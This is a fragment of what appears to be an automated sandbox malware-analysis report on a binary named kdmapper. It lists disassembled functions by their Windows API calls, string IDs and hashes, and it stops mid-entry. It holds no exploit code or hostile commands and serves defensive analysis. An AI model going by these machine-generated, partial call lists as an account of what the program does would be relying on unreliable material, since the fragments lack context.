                                                                                                                                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                                                              • String ID: $%s:$CAPTION$d$t
                                                                                                                                                                                                              • API String ID: 2407758923-369353836
                                                                                                                                                                                                              • Opcode ID: 0e37457aba8767a09685ecada18a0a182de460f9897c20d8455cc7e1919b779a
                                                                                                                                                                                                              • Instruction ID: 271e34d8069d77863f5e5ef5f52d71bf4a8af3c75d1d5bf01f5c93f5edf6fdb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e37457aba8767a09685ecada18a0a182de460f9897c20d8455cc7e1919b779a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB819271108341AFD710DF7ACD89A6FBBE9EBC9704F04091DFA84E7291D671E9098B62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 00E0CB66
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C71E
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C730
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C742
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C754
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C766
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C778
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C78A
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C79C
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7AE
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7C0
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7D2
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7E4
                                                                                                                                                                                                                • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7F6
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CB5B
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CB7D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CB92
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CB9D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CBBF
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CBD2
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CBE0
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CBEB
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CC23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CC2A
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CC47
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0CC5F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                              • String ID: h
                                                                                                                                                                                                              • API String ID: 161543041-3415971826
                                                                                                                                                                                                              • Opcode ID: bff30e76095829a9f480755d62e22d7ae1088b8d7005a330e7180371573933f4
                                                                                                                                                                                                              • Instruction ID: 38d22fd8d5adf826c14ff3332ddb87a9549622a8436ddc911f8ca3bfe7121a49
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bff30e76095829a9f480755d62e22d7ae1088b8d7005a330e7180371573933f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73314C316002069FEB21AB78D946B5AB7E9EF50314F247A19E599F61D2DE71ACC0CB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E09705
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E09711
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0971C
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E09727
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E09732
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0973D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E09748
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E09753
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0975E
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0976C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID: 0d
                                                                                                                                                                                                              • API String ID: 776569668-2809447700
                                                                                                                                                                                                              • Opcode ID: 49fcd44588b0000a2cb4fa4564f8cec3c50be60d780f1039012c92612bcaad59
                                                                                                                                                                                                              • Instruction ID: 20457c8f4aa7307075a1fd43062a21000d95facd3d3b17a9eaeb7eee054fa829
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49fcd44588b0000a2cb4fa4564f8cec3c50be60d780f1039012c92612bcaad59
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8411B97612010ABFCB01EF54C942CDD3BB9EF14350B5165A1FA486F1B2DE31DE909B84
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DF9736
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DF97D6
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00DF97E5
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00DF9806
                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF982D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                                              • API String ID: 1777411235-4209811716
                                                                                                                                                                                                              • Opcode ID: 6ecf0dcc99df42da71121969dd1adc86120342b7b3d1bdfc5774cf5ee24c31ab
                                                                                                                                                                                                              • Instruction ID: d3a8f24468f12e1d770e2b02a12d91439683d4e4d786f02dab31a405cd902656
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ecf0dcc99df42da71121969dd1adc86120342b7b3d1bdfc5774cf5ee24c31ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D13139329083057ED725AF30DC06FBBB79CEF42360F15811DF601A61D2EB609A4982B6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00DFD6C1
                                                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00DFD6ED
                                                                                                                                                                                                                • Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1
                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD709
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DFD720
                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00DFD734
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DFD75D
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00DFD764
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00DFD76D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                                                              • String ID: STATIC
                                                                                                                                                                                                              • API String ID: 3820355801-1882779555
                                                                                                                                                                                                              • Opcode ID: d312ba22e0a892b19f60882dce751eff7b412d61fc066603b6d76f678a862bd2
                                                                                                                                                                                                              • Instruction ID: 2786483a56c030ee5d9ae44b54cc4b9ce4cbe5a5eae14682378c3716dd074357
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d312ba22e0a892b19f60882dce751eff7b412d61fc066603b6d76f678a862bd2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 441136761003187FE221BB749C4AFBF765EEF05701F16C210FB02F6191DA648E0A42B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                              • API String ID: 322700389-393685449
                                                                                                                                                                                                              • Opcode ID: 9f12fe58a76100ba81327d2d4765dd2aff7b2f920d83a0fbea3560c2f58031f4
                                                                                                                                                                                                              • Instruction ID: 459ee51aba6c922b43f6c13af0a6a81c11146415351ba1892049cf0f435cbcdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f12fe58a76100ba81327d2d4765dd2aff7b2f920d83a0fbea3560c2f58031f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23B19B31901209EFCF29DFA4C8859AEB7F9FF08314F14615AE9057B292C731DA92CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE6FAA
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DE7013
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DE7084
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DE7AAB
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: GetLastError.KERNEL32 ref: 00DE7AF1
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: CloseHandle.KERNEL32(?), ref: 00DE7B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                              • API String ID: 3122303884-3508440684
                                                                                                                                                                                                              • Opcode ID: 61a09d563ea098400c1207138a78b20d5ecec92f96500989214ac9f22f02499d
                                                                                                                                                                                                              • Instruction ID: b9c56749b166ee546284d32d189b966baab450586557cec0402b7cc564ed6517
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61a09d563ea098400c1207138a78b20d5ecec92f96500989214ac9f22f02499d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED41F4B1D083C4AAEB70FB769C82FEE77AC9F14304F045455FA55B61C2D670AA888731
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                                                                                                                                                                • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00DFB610
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFB637
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00DFB650
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00DFB661
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00DFB66A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DFB67E
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DFB694
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                                                              • String ID: LICENSEDLG
                                                                                                                                                                                                              • API String ID: 3214253823-2177901306
                                                                                                                                                                                                              • Opcode ID: b1d27c7bf905a5cde48cad35b2f2d60298077257c47c5d73c02ff3edc629cc66
                                                                                                                                                                                                              • Instruction ID: 6597e95e67d7c91d5f52f96659d86314d9a4ae1f8200f4f782c31714973a43a4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1d27c7bf905a5cde48cad35b2f2d60298077257c47c5d73c02ff3edc629cc66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E21D03664020CBFD2215F77EC49E3B7B6DEB4BB90F068015F740FA1A0CB5299069635
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,32450A02,00000001,00000000,00000000,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFD99
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFE14
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DFFE1F
                                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00DFFE48
                                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00DFFE52
                                                                                                                                                                                                              • GetLastError.KERNEL32(80070057,32450A02,00000001,00000000,00000000,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFE57
                                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00DFFE6A
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFE80
                                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 00DFFE93
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1353541977-0
                                                                                                                                                                                                              • Opcode ID: addc33f7d92d5921b1719c92387dd6a88e185d0d93af385b894768211b59e9a9
                                                                                                                                                                                                              • Instruction ID: 6964f44153286013db817aa44cbe269f0ce2d21037d75ab06ea00be4082899e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: addc33f7d92d5921b1719c92387dd6a88e185d0d93af385b894768211b59e9a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1941C371A0021DAFDB109F69DC45BBEBBA8EF48710F15C23AFA05E7291D7349A4087B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                                                              • API String ID: 3519838083-3505469590
                                                                                                                                                                                                              • Opcode ID: beb23acc56d9e814f682b5f1235cf6dd34f60adb1ddbdbad35f35d2271bace5f
                                                                                                                                                                                                              • Instruction ID: 88dad9ab196483698eabb917c6d9b1ba27c2791ae6653008e0f818d412dfb94a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: beb23acc56d9e814f682b5f1235cf6dd34f60adb1ddbdbad35f35d2271bace5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D716D70A00259AFDB14EFAACC959AFBBB9FF49710B044159F512B72A0CB30BD45CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE9387
                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00DE93AA
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00DE93C9
                                                                                                                                                                                                                • Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2
                                                                                                                                                                                                                • Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DE9465
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00DE94D4
                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00DE9514
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                                              • API String ID: 3726343395-3303766350
                                                                                                                                                                                                              • Opcode ID: 2f61d455eaacfcc8dfda419c7d5a9266dce62cc83970c11f1f82ccc14d5a4365
                                                                                                                                                                                                              • Instruction ID: 8283f3f6fcc9a136969db0da76a98928b7d0ba522c1a0824c77958dd22021184
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f61d455eaacfcc8dfda419c7d5a9266dce62cc83970c11f1f82ccc14d5a4365
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE418871901299AACF21FB62CC55DEEB37CEF45340F0488A5B649E3051DB388B898B74
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00DF122E
